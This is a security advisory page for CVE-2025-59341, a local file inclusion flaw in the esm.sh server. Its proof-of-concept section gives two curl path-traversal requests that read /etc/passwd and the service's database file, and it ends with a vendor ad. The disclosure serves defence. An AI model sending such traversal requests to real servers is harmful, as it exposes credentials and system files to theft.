Vulnerability Database
296,676
Total vulnerabilities in the database
CVE-2025-59341
Summary
A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).
Severity: High — LFI can expose secrets, configuration files, credentials, or enable further compromise. Impact: reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.
Vulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168
Proof of Concept
- Using this default config file that I copy from the repo, the server is running at
http://localhost:9999with this commandgo run server/esmd/main.go --config=config.json
{
"port": 9999,
"npmRegistry": "https://registry.npmjs.org/",
"npmToken": "******"
}
- Trigger the LFI vulnerability by sending this command below to read a local file
# read /etc/passwd
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1'
# or read the database esm.db file
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1&module=1'
<img width="3338" height="1906" alt="poc-image" src="https://github.com/user-attachments/assets/f3721e5d-a09c-4227-960a-35279ff52811" />
Remediation
Simply remove any .. in the URL path before actually process the file. See more details in this guide
Credits
| Software | From | Fixed in |
|---|---|---|
github.com/esm-dev/esm.sh
|
- | 136.x |
Deep Security Visibility Without the Complexity
SynScan provides clear, real-time security insights so you can monitor your attack surface, spot risks early, and act fast—without extra complexity.
- No setup fees
- 5-min deployment
- Cancel anytime